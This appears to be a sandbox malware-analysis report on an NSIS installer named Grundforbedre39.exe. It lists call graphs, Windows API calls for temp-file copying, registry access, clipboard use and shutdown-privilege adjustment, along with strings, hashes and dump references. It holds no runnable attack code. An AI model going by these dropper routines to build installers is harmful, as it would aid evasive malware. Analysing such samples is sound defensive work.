calls 5616->5617 5618 401b26 wsprintfW 5617->5618 5619 402a4c 5618->5619 5627 10001058 5629 10001074 5627->5629 5628 100010dd 5629->5628 5630 10001516 GlobalFree 5629->5630 5631 10001092 5629->5631 5630->5631 5632 10001516 GlobalFree 5631->5632 5633 100010a2 5632->5633 5634 100010b2 5633->5634 5635 100010a9 GlobalSize 5633->5635 5636 100010b6 GlobalAlloc 5634->5636 5637 100010c7 5634->5637 5635->5634 5638 1000153d 3 API calls 5636->5638 5639 100010d2 GlobalFree 5637->5639 5638->5637 5639->5628 5647 40159b 5648 402bbf 18 API calls 5647->5648 5649 4015a2 SetFileAttributesW 5648->5649 5650 4015b4 5649->5650 5022 40229d 5023 4022a5 5022->5023 5024 4022ab 5022->5024 5025 402bbf 18 API calls 5023->5025 5026 4022b9 5024->5026 5027 402bbf 18 API calls 5024->5027 5025->5024 5028 4022c7 5026->5028 5029 402bbf 18 API calls 5026->5029 5027->5026 5030 402bbf 18 API calls 5028->5030 5029->5028 5031 4022d0 WritePrivateProfileStringW 5030->5031 5651 401f1d 5652 402bbf 18 API calls 5651->5652 5653 401f24 5652->5653 5654 4063f4 5 API calls 5653->5654 5655 401f33 5654->5655 5656 401fb7 5655->5656 5657 401f4f GlobalAlloc 5655->5657 5657->5656 5658 401f63 5657->5658 5659 4063f4 5 API calls 5658->5659 5660 401f6a 5659->5660 5661 4063f4 5 API calls 5660->5661 5662 401f74 5661->5662 5662->5656 5666 405f61 wsprintfW 5662->5666 5664 401fa9 5667 405f61 wsprintfW 5664->5667 5666->5664 5667->5656 5668 40149e 5669 4014ac PostQuitMessage 5668->5669 5670 402288 5668->5670 5669->5670 5671 40249e 5672 402cc9 19 API calls 5671->5672 5673 4024a8 5672->5673 5674 402ba2 18 API calls 5673->5674 5675 4024b1 5674->5675 5676 4024d5 RegEnumValueW 5675->5676 5677 4024c9 RegEnumKeyW 5675->5677 5679 40281e 5675->5679 5678 4024ee RegCloseKey 5676->5678 5676->5679 5677->5678 5678->5679 5032 40231f 5033 402324 5032->5033 5034 40234f 5032->5034 5036 402cc9 19 API calls 5033->5036 5035 402bbf 18 API calls 5034->5035 5037 402356 5035->5037 5038 40232b 5036->5038 5044 402bff RegOpenKeyExW 5037->5044 5039 402335 5038->5039 5043 40236c 5038->5043 5040 402bbf 18 API calls 5039->5040 5042 40233c RegDeleteValueW RegCloseKey 5040->5042 5042->5043 5045 402c93 5044->5045 5049 402c2a 5044->5049 5045->5043 5046 402c50 RegEnumKeyW 5047 402c62 RegCloseKey 5046->5047 5046->5049 5050 4063f4 5 API calls 5047->5050 5048 402c87 RegCloseKey 5053 402c76 5048->5053 5049->5046 5049->5047 5049->5048 5051 402bff 5 API calls 5049->5051 5052 402c72 5050->5052 5051->5049 5052->5053 5054 402ca2 RegDeleteKeyW 5052->5054 5053->5045 5054->5053 5688 403821 5689 40382c 5688->5689 5690 403830 5689->5690 5691 403833 GlobalAlloc 5689->5691 5691->5690 5692 100010e1 5694 10001111 5692->5694 5693 100011d8 GlobalFree 5694->5693 5695 100012ba 2 API calls 5694->5695 5696 100011d3 5694->5696 5697 10001164 GlobalAlloc 5694->5697 5698 100011f8 GlobalFree 5694->5698 5699 10001272 2 API calls 5694->5699 5700 100012e1 lstrcpyW 5694->5700 5701 100011c4 GlobalFree 5694->5701 5695->5694 5696->5693 5697->5694 5698->5694 5699->5701 5700->5694 5701->5694 5702 401ca3 5703 402ba2 18 API calls 5702->5703 5704 401ca9 IsWindow 5703->5704 5705 401a05 5704->5705 5706 402a27 SendMessageW 5707 402a41 InvalidateRect 5706->5707 5708 402a4c 5706->5708 5707->5708 4866 40242a 4877 402cc9 4866->4877 4868 402434 4869 402bbf 18 API calls 4868->4869 4870 40243d 4869->4870 4871 402448 RegQueryValueExW 4870->4871 4876 40281e 4870->4876 4872 40246e RegCloseKey 4871->4872 4873 402468 4871->4873 4872->4876 4873->4872 4881 405f61 wsprintfW 4873->4881 4878 402bbf 18 API calls 4877->4878 4879 402ce2 4878->4879 4880 402cf0 RegOpenKeyExW 4879->4880 4880->4868 4881->4872 5709 40422c lstrlenW 5710 40424b 5709->5710 5711 40424d WideCharToMultiByte 5709->5711 5710->5711 4887 40172d 4888 402bbf 18 API calls 4887->4888 4889 401734 SearchPathW 4888->4889 4890 40174f 4889->4890 5719 404532 5720 404542 5719->5720 5721 404568 5719->5721 5722 4040de 19 API calls 5720->5722 5723 404145 8 API calls 5721->5723 5724 40454f SetDlgItemTextW 5722->5724 5725 404574 5723->5725 5724->5721 5726 4027b4 5727 4027ba 5726->5727 5728 4027c2 FindClose 5727->5728 5729 402a4c 5727->5729 5728->5729 5730 401b37 5731 401b44 5730->5731 5732 401b88 5730->5732 5733 401bcd 5731->5733 5738 401b5b 5731->5738 5734 401bb2 GlobalAlloc 5732->5734 5735 401b8d 5732->5735 5737 40603c 18 API calls 5733->5737 5746 402288 5733->5746 5736 40603c 18 API calls 5734->5736 5735->5746 5751 40601a lstrcpynW 5735->5751 5736->5733 5742 402282 5737->5742 5749 40601a lstrcpynW 5738->5749 5740 401b9f GlobalFree 5740->5746 5744 40575f MessageBoxIndirectW 5742->5744 5743 401b6a 5750 40601a lstrcpynW 5743->5750 5744->5746 5747 401b79 5752 40601a lstrcpynW 5747->5752 5749->5743 5750->5747 5751->5740 5752->5746 5753 402537 5754 402562 5753->5754 5755 40254b 5753->5755 5757 402596 5754->5757 5758 402567 5754->5758 5756 402ba2 18 API calls 5755->5756 5764 402552 5756->5764 5759 402bbf 18 API calls 5757->5759 5760 402bbf 18 API calls 5758->5760 5762 40259d lstrlenW 5759->5762 5761 40256e WideCharToMultiByte lstrlenA 5760->5761 5761->5764 5762->5764 5763 4025ca 5765 405ca1 WriteFile 5763->5765 5767 4025e0 5763->5767 5764->5763 5766 405cd0 5 API calls 5764->5766 5764->5767 5765->5767 5766->5763 4911 4052b8 4912 405462 4911->4912 4913 4052d9 GetDlgItem GetDlgItem GetDlgItem 4911->4913 4914 40546b GetDlgItem CreateThread CloseHandle 4912->4914 4917 405493 4912->4917 4957 404113 SendMessageW 4913->4957 4914->4917 4960 40524c 5 API calls 4914->4960 4916 405349 4923 405350 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4916->4923 4918 4054be 4917->4918 4919 4054e3 4917->4919 4920 4054aa ShowWindow ShowWindow 4917->4920 4921 4054ca 4918->4921 4922 40551e 4918->4922 4927 404145 8 API calls 4919->4927 4959 404113 SendMessageW 4920->4959 4925 4054d2 4921->4925 4926 4054f8 ShowWindow 4921->4926 4922->4919 4930 40552c SendMessageW 4922->4930 4928 4053a2 SendMessageW SendMessageW 4923->4928 4929 4053be 4923->4929 4931 4040b7 SendMessageW 4925->4931 4933 405518 4926->4933 4934 40550a 4926->4934 4932 4054f1 4927->4932 4928->4929 4936 4053d1 4929->4936 4937 4053c3 SendMessageW 4929->4937 4930->4932 4938 405545 CreatePopupMenu 4930->4938 4931->4919 4935 4040b7 SendMessageW 4933->4935 4939 405179 25 API calls 4934->4939 4935->4922 4941 4040de 19 API calls 4936->4941 4937->4936 4940 40603c 18 API calls 4938->4940 4939->4933 4942 405555 AppendMenuW 4940->4942 4943 4053e1 4941->4943 4944 405572 GetWindowRect 4942->4944 4945 405585 TrackPopupMenu 4942->4945 4946 4053ea ShowWindow 4943->4946 4947 40541e GetDlgItem SendMessageW 4943->4947 4944->4945 4945->4932 4948 4055a0 4945->4948 4949 405400 ShowWindow 4946->4949 4950 40540d 4946->4950 4947->4932 4951 405445 SendMessageW SendMessageW 4947->4951 4952 4055bc SendMessageW 4948->4952 4949->4950 4958 404113 SendMessageW 4950->4958 4951->4932 4952->4952 4953 4055d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4952->4953 4955 4055fe SendMessageW 4953->4955 4955->4955 4956 405627 GlobalUnlock SetClipboardData CloseClipboard 4955->4956 4956->4932 4957->4916 4958->4947 4959->4918 5768 4014b8 5769 4014be 5768->5769 5770 401389 2 API calls 5769->5770 5771 4014c6 5770->5771 4967 4015b9 4968 402bbf 18 API calls 4967->4968 4969 4015c0 4968->4969 4970 405a79 4 API calls 4969->4970 4983 4015c9 4970->4983 4971 401629 4973 40165b 4971->4973 4974 40162e 4971->4974 4972 4059fb CharNextW 4972->4983 4977 401423 25 API calls 4973->4977 4975 401423 25 API calls 4974->4975 4976 401635 4975->4976 4986 40601a lstrcpynW 4976->4986 4980 401653 4977->4980 4979 4056c5 2 API calls 4979->4983 4981 4056e2 5 API calls 4981->4983 4982 401642 SetCurrentDirectoryW 4982->4980 4983->4971 4983->4972 4983->4979 4983->4981 4984 40160f GetFileAttributesW 4983->4984 4985 405648 4 API calls 4983->4985 4984->4983 4985->4983 4986->4982 5772 40293b 5773 402ba2 18 API calls 5772->5773 5774 402941 5773->5774 5775 402964 5774->5775 5776 40297d 5774->5776 5783 40281e 5774->5783 5779 402969 5775->5779 5780 40297a 5775->5780 5777 402993 5776->5777 5778 402987 5776->5778 5782 40603c 18 API calls 5777->5782 5781 402ba2 18 API calls 5778->5781 5786 40601a lstrcpynW 5779->5786 5787 405f61 wsprintfW 5780->5787 5781->5783 5782->5783 5786->5783 5787->5783 5788 10002a7f 5789 10002a97 5788->5789 5790 1000158f 2 API calls 5789->5790 5791 10002ab2 5790->5791

                                                                                      Executed Functions

                                                                                      Function 0040326A Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 401stringfilecomCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 40326a-40329d SetErrorMode GetVersion 1 4032b0 0->1 2 40329f-4032a7 call 4063f4 0->2 3 4032b5-4032c9 call 406384 lstrlenA 1->3 2->1 8 4032a9 2->8 9 4032cb-40333f call 4063f4 * 2 #17 OleInitialize SHGetFileInfoW call 40601a GetCommandLineW call 40601a GetModuleHandleW 3->9 8->1 18 403341-403348 9->18 19 403349-403363 call 4059fb CharNextW 9->19 18->19 22 403369-40336f 19->22 23 40347a-403494 GetTempPathW call 403239 19->23 24 403371-403376 22->24 25 403378-40337c 22->25 32 403496-4034b4 GetWindowsDirectoryW lstrcatW call 403239 23->32 33 4034ec-403506 DeleteFileW call 402dee 23->33 24->24 24->25 27 403383-403387 25->27 28 40337e-403382 25->28 30 403446-403453 call 4059fb 27->30 31 40338d-403393 27->31 28->27 48 403455-403456 30->48 49 403457-40345d 30->49 36 403395-40339d 31->36 37 4033ae-4033e7 31->37 32->33 46 4034b6-4034e6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403239 32->46 50 4035b7-4035c7 call 403789 OleUninitialize 33->50 51 40350c-403512 33->51 42 4033a4 36->42 43 40339f-4033a2 36->43 44 403404-40343e 37->44 45 4033e9-4033ee 37->45 42->37 43->37 43->42 44->30 47 403440-403444 44->47 45->44 52 4033f0-4033f8 45->52 46->33 46->50 47->30 54 403465-403473 call 40601a 47->54 48->49 49->22 55 403463 49->55 69 4036ed-4036f3 50->69 70 4035cd-4035dd call 40575f ExitProcess 50->70 56 4035a7-4035ae call 403863 51->56 57 403518-403523 call 4059fb 51->57 59 4033fa-4033fd 52->59 60 4033ff 52->60 62 403478 54->62 55->62 68 4035b3 56->68 74 403571-40357b 57->74 75 403525-40355a 57->75 59->44 59->60 60->44 62->23 68->50 72 403771-403779 69->72 73 4036f5-40370b GetCurrentProcess OpenProcessToken 69->73 76 40377b 72->76 77 40377f-403783 ExitProcess 72->77 81 403741-40374f call 4063f4 73->81 82 40370d-40373b LookupPrivilegeValueW AdjustTokenPrivileges 73->82 79 4035e3-4035f7 call 4056e2 lstrcatW 74->79 80 40357d-40358b call 405ad6 74->80 83 40355c-403560 75->83 76->77 94 403604-40361e lstrcatW lstrcmpiW 79->94 95 4035f9-4035ff lstrcatW 79->95 80->50 93 40358d-4035a3 call 40601a * 2 80->93 96 403751-40375b 81->96 97 40375d-403768 ExitWindowsEx 81->97 82->81 87 403562-403567 83->87 88 403569-40356d 83->88 87->88 92 40356f 87->92 88->83 88->92 92->74 93->56 94->50 99 403620-403623 94->99 95->94 96->97 100 40376a-40376c call 40140b 96->100 97->72 97->100 102 403625-40362a call 405648 99->102 103 40362c call 4056c5 99->103 100->72 111 403631-40363f SetCurrentDirectoryW 102->111 103->111 112 403641-403647 call 40601a 111->112 113 40364c-403675 call 40601a 111->113 112->113 117 40367a-403696 call 40603c DeleteFileW 113->117 120 4036d7-4036df 117->120 121 403698-4036a8 CopyFileW 117->121 120->117 122 4036e1-4036e8 call 405ebb 120->122 121->120 123 4036aa-4036ca call 405ebb call 40603c call 4056fa 121->123 122->50 123->120 132 4036cc-4036d3 CloseHandle 123->132 132->120
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 0040328D
                                                                                      • GetVersion.KERNEL32 ref: 00403293
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                                                                      • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                                                                      • OleInitialize.OLE32(00000000), ref: 004032E6
                                                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Grundforbedre39.exe",00000000), ref: 0040332A
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Grundforbedre39.exe",?), ref: 00403351
                                                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,?,?,004032D3,00000009), ref: 00406406
                                                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348B
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040349C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034A8
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BC
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C4
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D5
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034DD
                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 004034F1
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                      • OleUninitialize.OLE32(?), ref: 004035BC
                                                                                      • ExitProcess.KERNEL32 ref: 004035DD
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004035F0
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C), ref: 004035FF
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040360A
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Grundforbedre39.exe",00000000,?), ref: 00403616
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403632
                                                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Grundforbedre39.exe,0041FEA8,00000001), ref: 004036A0
                                                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 004036FC
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                                                                      • ExitProcess.KERNEL32 ref: 00403783
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb$C:\Users\user\Desktop$C:\Users\user\Desktop\Grundforbedre39.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      • API String ID: 2488574733-1456337316
                                                                                      • Opcode ID: c7933ff0207dc42ed488cfd770cac36fd4143b1ba3a2b25aa7f82e1899741bfa
                                                                                      • Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
                                                                                      • Opcode Fuzzy Hash: c7933ff0207dc42ed488cfd770cac36fd4143b1ba3a2b25aa7f82e1899741bfa
                                                                                      • Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004052B8 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 133 4052b8-4052d3 134 405462-405469 133->134 135 4052d9-4053a0 GetDlgItem * 3 call 404113 call 404a16 GetClientRect GetSystemMetrics SendMessageW * 2 133->135 136 405493-4054a0 134->136 137 40546b-40548d GetDlgItem CreateThread CloseHandle 134->137 153 4053a2-4053bc SendMessageW * 2 135->153 154 4053be-4053c1 135->154 140 4054a2-4054a8 136->140 141 4054be-4054c8 136->141 137->136 143 4054e3-4054ec call 404145 140->143 144 4054aa-4054b9 ShowWindow * 2 call 404113 140->144 145 4054ca-4054d0 141->145 146 40551e-405522 141->146 157 4054f1-4054f5 143->157 144->141 150 4054d2-4054de call 4040b7 145->150 151 4054f8-405508 ShowWindow 145->151 146->143 148 405524-40552a 146->148 148->143 155 40552c-40553f SendMessageW 148->155 150->143 158 405518-405519 call 4040b7 151->158 159 40550a-405513 call 405179 151->159 153->154 161 4053d1-4053e8 call 4040de 154->161 162 4053c3-4053cf SendMessageW 154->162 163 405641-405643 155->163 164 405545-405570 CreatePopupMenu call 40603c AppendMenuW 155->164 158->146 159->158 172 4053ea-4053fe ShowWindow 161->172 173 40541e-40543f GetDlgItem SendMessageW 161->173 162->161 163->157 170 405572-405582 GetWindowRect 164->170 171 405585-40559a TrackPopupMenu 164->171 170->171 171->163 174 4055a0-4055b7 171->174 175 405400-40540b ShowWindow 172->175 176 40540d 172->176 173->163 177 405445-40545d SendMessageW * 2 173->177 178 4055bc-4055d7 SendMessageW 174->178 179 405413-405419 call 404113 175->179 176->179 177->163 178->178 180 4055d9-4055fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->173 182 4055fe-405625 SendMessageW 180->182 182->182 183 405627-40563b GlobalUnlock SetClipboardData CloseClipboard 182->183 183->163
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405316
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                                                                      • GetClientRect.USER32(?,?), ref: 00405362
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405369
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                                                                      • ShowWindow.USER32(?,?), ref: 00405405
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                                                                        • Part of subcall function 00404113: SendMessageW.USER32(?,?,00000001,00403F3F), ref: 00404121
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0040548D
                                                                                      • ShowWindow.USER32(00000000), ref: 004054B1
                                                                                      • ShowWindow.USER32(?,?), ref: 004054B6
                                                                                      • ShowWindow.USER32(?), ref: 00405500
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                                                                      • CreatePopupMenu.USER32 ref: 00405545
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                                                                      • GetWindowRect.USER32(?,?), ref: 00405579
                                                                                      • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405592
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                                                                      • OpenClipboard.USER32(00000000), ref: 004055DA
                                                                                      • EmptyClipboard.USER32 ref: 004055E0
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                                                                      • CloseClipboard.USER32 ref: 0040563B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: {$&B
                                                                                      • API String ID: 590372296-2518801558
                                                                                      • Opcode ID: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
                                                                                      • Instruction ID: b072520f5ee80a331e4e918265d0c1a5052efaeab479527f9264255038cc5675
                                                                                      • Opcode Fuzzy Hash: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
                                                                                      • Instruction Fuzzy Hash: BDB13B71900208FFDB219F60DD89AAE7B79FB44355F10803AFA01B61A0C7755E92DF69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403863 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 287 403863-40387b call 4063f4 290 40387d-403888 GetUserDefaultUILanguage call 405f61 287->290 291 40388f-4038c6 call 405ee7 287->291 294 40388d 290->294 297 4038c8-4038d9 call 405ee7 291->297 298 4038de-4038e4 lstrcatW 291->298 296 4038e9-403912 call 403b39 call 405ad6 294->296 304 4039a4-4039ac call 405ad6 296->304 305 403918-40391d 296->305 297->298 298->296 311 4039ba-4039df LoadImageW 304->311 312 4039ae-4039b5 call 40603c 304->312 305->304 306 403923-40393d call 405ee7 305->306 310 403942-40394b 306->310 310->304 313 40394d-403951 310->313 315 403a60-403a68 call 40140b 311->315 316 4039e1-403a11 RegisterClassW 311->316 312->311 320 403963-40396f lstrlenW 313->320 321 403953-403960 call 4059fb 313->321 328 403a72-403a7d call 403b39 315->328 329 403a6a-403a6d 315->329 317 403a17-403a5b SystemParametersInfoW CreateWindowExW 316->317 318 403b2f 316->318 317->315 326 403b31-403b38 318->326 322 403971-40397f lstrcmpiW 320->322 323 403997-40399f call 4059ce call 40601a 320->323 321->320 322->323 327 403981-40398b GetFileAttributesW 322->327 323->304 332 403991-403992 call 405a1a 327->332 333 40398d-40398f 327->333 339 403a83-403a9d ShowWindow call 406384 328->339 340 403b06-403b07 call 40524c 328->340 329->326 332->323 333->323 333->332 347 403aa9-403abb GetClassInfoW 339->347 348 403a9f-403aa4 call 406384 339->348 343 403b0c-403b0e 340->343 345 403b10-403b16 343->345 346 403b28-403b2a call 40140b 343->346 345->329 349 403b1c-403b23 call 40140b 345->349 346->318 352 403ad3-403af6 DialogBoxParamW call 40140b 347->352 353 403abd-403acd GetClassInfoW RegisterClassW 347->353 348->347 349->329 356 403afb-403b04 call 4037b3 352->356 353->352 356->326
                                                                                      APIs
                                                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,?,?,004032D3,00000009), ref: 00406406
                                                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00000000), ref: 0040387D
                                                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                                      • lstrcatW.KERNEL32(1033,004226E8), ref: 004038E4
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,75B23420), ref: 00403964
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403982
